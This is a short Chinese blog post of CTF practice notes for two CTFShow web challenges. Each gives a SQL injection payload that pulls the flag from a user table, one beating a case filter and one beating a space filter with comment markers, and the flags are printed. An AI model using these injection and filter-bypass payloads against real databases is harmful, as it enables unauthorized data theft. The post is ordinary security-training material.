11.2web方向刷题笔记

最新推荐文章于 2024-05-23 10:51:03 发布
最新推荐文章于 2024-05-23 10:51:03 发布
阅读量33 收藏
点赞数
分类专栏: 刷题笔记 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74806803/article/details/134189878
版权

题目来源:CTF Show

一、web入门 web176

1.根据提示存在过滤,大小写过滤试一试

 -1' uNion sElect 1,2,password from  ctfshow_user where username="flag"--+

 获得flag:ctfshow{eb72e4c5-89a5-45de-b984-abeee0610e7d}

二、web入门web177

1.题目过滤了空格,用/**/代替

-1'union/**/select/**/1,2,password/**/from/**/ctfshow_user/**/where/**/username='flag'%23

获得flag!

BlackH.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
通达oa 11.2 安装包
02-22
通达oa 11.2 安装包
零基础Web安全学习笔记_web安全学习笔记 web技术演化
2401_84301853的博客
04-30 394
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
原创Kafka学习笔记,java字符串不相等
jixuczy的博客
07-19 112
为了更好的梳理相关知识,咱们先看纯手绘知识体系图 1.1 Kafka知识体系大纲 由于我手绘这些知识体系大纲是用的xmind软件,无法上传,所以都以截图的形式展示,细节处不清楚(毕竟图片形式有限) 1.2 RabbitMQ知识体系大纲 1.3 RocketMQ知识体系大纲 看完知识大纲,该刷面试了 2.1 刷刷Kafka面试 Kafka的用途有哪些?使用场景如何? Kafka中的ISR、AR又代表什么?ISR的伸缩又指什么 Kafka中的HW、LEO、LSO、LW等分别代表什么? Kafka中
消息中间件合集:MQ(ActiveMQ/RabbitMQ/RocketMQ)+Kafka+笔记
m0_71777195的博客
08-25 181
关于消息中间件小编从每个的知识体系大纲开始,进行知识唤醒与梳理,然后再去刷刷各大面试高频题(附有详细的答案),最后在知识出现纰漏时尽快弥补(查找学习笔记)。这一整套的知识大纲+面试高频真题+学习笔记,缺一不可,如果你也想查漏补缺或者准备面试刷刷刷,那就直接去共重号:爱穿格子衫的程序猿 即可。
(ActiveMQ/RabbitMQ/RocketMQ)+Kafka笔记,这份神仙笔记,让我佩服的五体投地
m0_71563599的博客
09-16 136
最近有好多朋友都去面试,面完回来跟我说。额,有点不知所措,于是乎小编就想着做一次消息中间件的专题,归类整理了MQ( ActiveMQ/RabbitMQ/RocketMQ)+Kafka等的纯手绘知识体系图、面试以及相关的学习笔记
惊了 消息中间件合集:MQ(ActiveMQ/RabbitMQ/RocketMQ)+Kafka+笔记
m0_55849656的博客
06-14 228
消息中间件合集:MQ(ActiveMQ/RabbitMQ/RocketMQ)+Kafka+笔记
java读取csv文件某一列,附学习笔记+面试整理+进阶书籍
m0_57286571的博客
05-20 467
前言 二面大概50分钟,问的东西很全面,需要做充足准备,就是除了概念以外问的有点懵逼了(呜呜呜)。回来之后把这些题目做了一个分类并整理出答案(强迫症的我狂补知识~)分为spring,jvm,并发编程等,接下来分享一下我的这蚂蚁金服面试的面经+一些我的学习笔记。 为了更好的梳理相关知识,咱们先看纯手绘知识体系图 1.1 Kafka知识体系大纲 由于我手绘这些知识体系大纲是用的xmind软件,无法上传,所以都以截图的形式展示,细节处不清楚(毕竟图片形式有限) 1.2 RabbitMQ知识体系大纲 1.
字节跳动学习笔记:分布式宝典:限流+缓存+通讯,已开源下载
m0_57286679的博客
04-28 176
前言 很多Java程序员一直希望找到一份完整的学习路径,但是市面上很多书都是专注某一个领域的,没有一份完整的大图,以至于很多程序员很迷茫,不知道自己到底应该从哪里开始学,或者不知道自己学习些什么。 好在,很早之前就有一位阿里巴巴的技术专家总结了一份**《Java工程师成神之路》**,作者按照自己的经验总结了从基础,到高级、底层、架构、进阶、扩展等6个大的章节。几乎囊括了Java体系内的所有知识点。 这份资料之前开源在GitHub上,短短几个月时间,收获了15k+的Star数,最近,笔者了解到,该项目有了重大
Java教程!一个月成功收割腾讯、百度、美团、网易offer
m0_57285455的博客
06-21 155
为了更好的梳理相关知识,咱们先看纯手绘知识体系图 1.1 Kafka知识体系大纲 由于我手绘这些知识体系大纲是用的xmind软件,无法上传,所以都以截图的形式展示,细节处不清楚(毕竟图片形式有限) 1.2 RabbitMQ知识体系大纲 1.3 RocketMQ知识体系大纲 看完知识大纲,该刷面试了 2.1 刷刷Kafka面试 Kafka的用途有哪些?使用场景如何? Kafka中的ISR、AR又代表什么?ISR的伸缩又指什么 Kafka中的HW、LEO、LSO、LW等分别代表什么? Kafka中
Java开发需要学什么,java经典面试题及答案
EDGNB123的博客
04-30 99
前言 事务我们都知道是什么,而Spring事务就是在数据库之上利用AOP提供声明式事务和编程式事务帮助我们简化开发,解耦业务逻辑和系统逻辑。但是Spring事务原理是怎样?事务在方法间是如何传播的?为什么有时候事务会失效?接下来咱就一一解答~重点分析Spring事务源码,让我们彻底搞懂Spring事务的原理。 为了更好的梳理相关知识,咱们先看纯手绘知识体系图 1.1 Kafka知识体系大纲 由于我手绘这些知识体系大纲是用的xmind软件,无法上传,所以都以截图的形式展示,细节处不清楚(毕竟图片形式有限
oracle11.2.0.4 for windows 安装包
07-21
内容包含: p13390677_112040_MSWIN-x86-64_1of7.zip p13390677_112040_MSWIN-x86-64_2of7.zip p13390677_112040_MSWIN-x86-64_3of7.zip p13390677_112040_MSWIN-x86-64_4of7.zip p13390677_112040_MSWIN-x86-64_5of...
GCC 11.2 离线安装包
04-09
GCC 11.2 离线安装包
oracle11.2客户端.rar
09-24
内置instantclien-basic-windows.x64-11.2.0.4.0.zip包,亲测可用,所以分享给大家
oracle11.2.0.4 for linux 安装包
07-21
内容包含: p13390677_112040_Linux-x86-64_1of7.zip p13390677_112040_Linux-x86-64_2of7.zip
【加密与解密(第四版)】第四章笔记
m0_58213960的博客
05-21 612
x64系统通用寄存器的名称,第1个字母从“E”改为“R”(例如“RAX”),大小扩展到 64 位,数量增加了8个(R8~R15),扩充了8个128位XMM寄存器(在64位程序中,XMM寄存器经常被用来优化代码)。64位寄存器与x86下的32位寄存器兼容,例如RAX(64位)EAX(低32)、AX(低16位)、AL(低8位)和AH(8~15位)。x64新扩展的寄存器高低位访问,使用WORD、BYTE、DWORD后级,例如R8(64位)R8D(低32位)、R8W(低16位)和R8B(低8位)。
k8s笔记 | helm包管理
weixin_41104307的博客
05-19 357
如果是在 arm64下的话,使用 registry.cn-beijing.aliyuncs.com/pylixm/nfs-subdir-external-provisioner:v4.0.0 这个镜像会报错 exec / nfs-subdir-external-provisioner format error 简单来说就是平台不匹配,解决方案就是自己构建一个匹配的镜像包。由于需要提前创建storageClass manage-nfc-storage,在前面的章节中总共有三个文件。
sheng的学习笔记-AI-贝叶斯(Bayesian)分类
最新发布
coldstarry的专栏
05-23 516
贝叶斯网络,贝叶斯算法,朴素贝叶斯分类器,半朴素贝叶斯分类器,拉普拉斯修正
LeetCode刷题笔记第1859题:将句子排序
qq_29787929的博客
05-17 200
通过空格切分句子为单词列表,根据最后每个单词的最后一个数字在新的列表中存入相对应的位置,返回按照新列表中的顺序拼接的句子。因为创建了一个新的列表,空间复杂度O(n)因为要遍历整个列表,时间复杂度O(n)
winhex11.2
12-04
WinHex是一款功能强大的十六进制编辑工具,适用于计算机取证、数据恢复、内存分析、磁盘编辑等多种场景。WinHex 11.2是该软件的一个特定版本,具有以下特点和功能。 首先,WinHex 11.2提供了全面的十六进制编辑功能。它可以直接读取并编辑计算机上的任何文件,包括硬盘、内存和光盘等。用户可以轻松地修改和分析这些文件的内容,无论是文本还是二进制数据,都可以在WinHex中得到清晰准确的显示和编辑。 其次,WinHex 11.2还具备强大的取证功能。它可以通过扫描和分析文件系统,发现已删除或隐藏的文件,帮助用户还原被删除的数据。此外,WinHex还支持对磁盘和内存进行原始数据和图像的取证,为计算机取证工作提供了有力的支持。 除了上述功能,WinHex 11.2还具备其他实用的工具和功能。它可以用作文件和磁盘的比较工具,快速找到两个文件之间的差异。此外,WinHex还支持加密和解密文件,保护用户的数据安全。用户还可以使用WinHex来执行批处理任务,自动化一些重复的操作。 总之,WinHex 11.2是一款功能强大、功能丰富的十六进制编辑工具。它在计算机取证、数据恢复和内存分析等方面有着广泛的应用,为用户提供了便捷高效的操作和分析工具。无论是专业用户还是普通用户,都可以通过使用WinHex 11.2来处理和分析各种类型的数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

BlackH.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值